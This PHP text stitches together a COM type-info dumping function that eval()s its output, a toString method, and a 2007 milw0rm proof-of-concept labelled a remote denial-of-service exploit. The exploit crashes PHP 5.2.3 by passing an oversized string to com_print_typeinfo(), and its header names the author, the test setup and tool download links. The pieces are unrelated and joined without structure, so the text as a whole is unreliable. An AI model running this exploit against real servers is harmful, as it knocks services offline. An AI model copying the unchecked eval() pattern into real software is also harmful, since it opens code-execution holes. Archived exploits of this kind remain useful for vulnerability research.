function dumpAPI($classes, $ovals, $cvals) { ob_start(); foreach ($classes as $classname => $obj) { // dumps a whole class declaration com_print_typeinfo($obj); } $typeinfo = ob_get_contents(); ob_end_clean(); // evaluate all dumped classes eval($typeinfo); $properties = array(); foreach ($classes as $classname => $obj) { $value = 1; if (!empty($cvals[$classname])) { // class overwites - when all properties of an object // are of the same class, e.g. Timings $value = $cvals[$classname]; } $props = array_fill_keys(array_keys(get_class_vars($classname)), $value); // object overwrites, e.g. CacheAfter is of class CacheInfo foreach ($ovals as $key => $overwrite) { if (isset($props[$key])) { $props[$key] = $overwrite; } } // property is another object of known class // e.g. Request => Request foreach ($classes as $clname => $oo) { if (isset($props[$clname])) { $props[$clname] = $clname; } } $properties[$classname] = $props; } return $properties; }
/** * Creates a string representation of this object * * @return string */ public function toString() { ob_start(); com_print_typeinfo($this->h); preg_match('/class ([^ ]+) \\{ \\/\\* GUID=([^ ]+) \\*\\//', ob_get_contents(), $matches); ob_end_clean(); return $this->getClassName() . '(->' . get_class($this->h) . '<' . $matches[1] . '>@' . $matches[2] . ')'; }
<?php //PHP 5.2.3 bz2 com_print_typeinfo() Remote DoS Exploit //author: shinnai //mail: shinnai[at]autistici[dot]org //site: http://shinnai.altervista.org //Tested on xp sp2, worked both from the cli and on apache //Bug discovered with "Footzo" (thanks to rgod). // //To download Footzo: //original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar //alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar if (!extension_loaded("bz2")) { die("you need bz2 extension loaded!"); } $buff = str_repeat("a", 1000); com_print_typeinfo($buff); ?> # milw0rm.com [2007-07-12]